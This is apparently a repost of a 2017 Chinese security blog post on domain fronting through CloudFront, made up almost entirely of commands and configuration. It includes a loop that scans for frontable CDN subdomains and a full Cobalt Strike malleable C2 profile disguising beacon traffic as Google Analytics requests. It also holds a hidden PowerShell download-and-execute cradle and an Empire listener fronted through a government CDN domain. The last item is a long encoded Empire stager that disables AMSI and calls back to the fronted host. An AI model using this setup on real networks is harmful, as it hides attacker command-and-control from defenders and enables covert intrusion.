本文讲的是
隐匿的攻击之-Domain Fronting,
0x01 简介
wget -U demo -q -O - http://evi1cg.me/foo.txt hello there !
wget -U demo -q -O - http://d289wv3b5uz3me.cloudfront.net/foo.txt hello there !
wget -U demo -q -O - http://a0.awsstatic.com/foo.txt
wget -U demo -q -O - http://a0.awsstatic.com/foo.txt --header "Host: d289wv3b5uz3me.cloudfront.net"
for i in {a..z}; do for j in {0..9}; do wget -U demo -q -O - http://$i$j.awsstatic.com/foo.txt --header "Host: d289wv3b5uz3me.cloudfront.net" && echo $i$j; done;done
cdn.az.gov,cdn.zendesk.com,cdn.atlassian.com,a1.awsstatic.com,f0.awsstatic.com
http-get { client { header "Host" "[your distribution].cloudfront.net";
http-post { client { header "Host" "[your distribution].cloudfront.net";
# make our C2 look like a Google Web Bug # https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting # # Author: @armitagehacker http-get { set uri "/__utm.gif"; client { parameter "utmac" "UA-2202604-2"; parameter "utmcn" "1"; parameter "utmcs" "ISO-8859-1"; parameter "utmsr" "1280x1024"; parameter "utmsc" "32-bit"; parameter "utmul" "en-US"; header "Host" "d289wv3b5uz3me.cloudfront.net"; metadata { netbios; prepend "__utma"; parameter "utmcc"; } } server { header "Content-Type" "image/gif"; output { # hexdump pixel.gif # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 # 0000020 01 00 01 00 00 02 01 44 00 3b prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; print; } } } http-post { set uri "/___utm.gif"; client { header "Content-Type" "application/octet-stream"; id { prepend "UA-220"; append "-2"; parameter "utmac"; } parameter "utmcn" "1"; parameter "utmcs" "ISO-8859-1"; parameter "utmsr" "1280x1024"; parameter "utmsc" "32-bit"; parameter "utmul" "en-US"; header "Host" "d289wv3b5uz3me.cloudfront.net"; output { print; } } server { header "Content-Type" "image/gif"; output { prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b"; prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00"; prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00"; print; } } } # dress up the staging process too http-stager { server { header "Content-Type" "image/gif"; } }
./c2lint Malleable-C2-Profiles/normal/webbug.profile
cobal sudo ./teamserver [your ip] hacktest webbug.profile
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://d289wv3b5uz3me.cloudfront.net:80/a'))"
(Empire: listeners) > uselistener http (Empire: listeners/http) > (Empire: listeners/http) > set Host http://cdn.az.gov:80 (Empire: listeners/http) > set DefaultProfile /admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0;rv:11.0) like Gecko | Host:d289wv3b5uz3me.cloudfront.net (Empire: listeners/http) > execute [*] Starting listener 'http' [+] Listener successfully started!
(Empire: listeners) > usestager multi/launcher (Empire: stager/multi/launcher) > set Listener http (Empire: stager/multi/launcher) > generate powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBSAEUAZgBdAC4AQQBTAFMARQBNAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkAZQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUARQAoACQATgBVAGwATAAsACQAVAByAFUARQApAH0AOwBbAFMAeQBTAHQAZQBtAC4ATgBFAHQALgBTAGUAUgB2AGkAYwBlAFAATwBpAE4AVABNAGEAbgBhAEcAZQByAF0AOgA6AEUAWABwAGUAQwB0ADEAMAAwAEMAbwBOAHQASQBOAFUAZQA9ADAAOwAkAHcAQwA9AE4ARQBXAC0ATwBCAEoARQBDAHQAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AVwBFAEIAQwBMAEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwBOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYwAuAEgARQBBAEQARQBSAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAHgAWQA9AFsAUwBZAHMAVABFAG0ALgBOAGUAdAAuAFcARQBiAFIARQBxAFUAZQBTAFQAXQA6ADoARABlAEYAYQB1AEwAdABXAEUAQgBQAHIAbwBYAHkAOwAkAHcAYwAuAFAAUgBvAHgAeQAuAEMAUgBlAEQARQBOAHQAaQBhAEwAcwAgAD0AIABbAFMAWQBzAHQARQBtAC4ATgBlAFQALgBDAHIAZQBEAGUAbgBUAEkAQQBsAEMAQQBjAGgAZQBdADoAOgBEAEUARgBhAFUAbAB0AE4ARQBUAHcATwByAGsAQwByAGUAZABlAG4AVABJAGEAbABTADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAGQASQBuAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAHQAQgB5AHQARQBzACgAJwBlADEAMABhAGQAYwAzADkANAA5AGIAYQA1ADkAYQBiAGIAZQA1ADYAZQAwADUANwBmADIAMABmADgAOAAzAGUAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AE8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AEMALgBIAEUAQQBEAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQAIgAsACIAZAAyADgAOQB3AHYAMwBiADUAdQB6ADMAbQBlAC4AYwBsAG8AdQBkAGYAcgBvAG4AdAAuAG4AZQB0ACIAKQA7ACQAVwBjAC4ASABFAEEAZABFAHIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AUgBTAHoAKwB5AEQAUABVAFEAcgBwAGwAVQBNAGQAbABKAEIAKwBVAEoAZwBEAHAAagB1AHcAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAGMAZABuAC4AYQB6AC4AZwBvAHYAOgA4ADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AYQBzAHAAJwA7ACQAZABBAHQAYQA9ACQAVwBDAC4ARABPAFcATgBsAG8AYQBEAEQAYQB0AEEAKAAkAHMARQByACsAJABUACkAOwAkAGkAVgA9ACQAZABBAHQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQARABBAHQAQQBbADQALgAuACQARABBAFQAYQAuAEwARQBuAGcAdABIAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABhAFQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
原文发布时间为:2017年2月28日
本文作者:Evi1cg
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。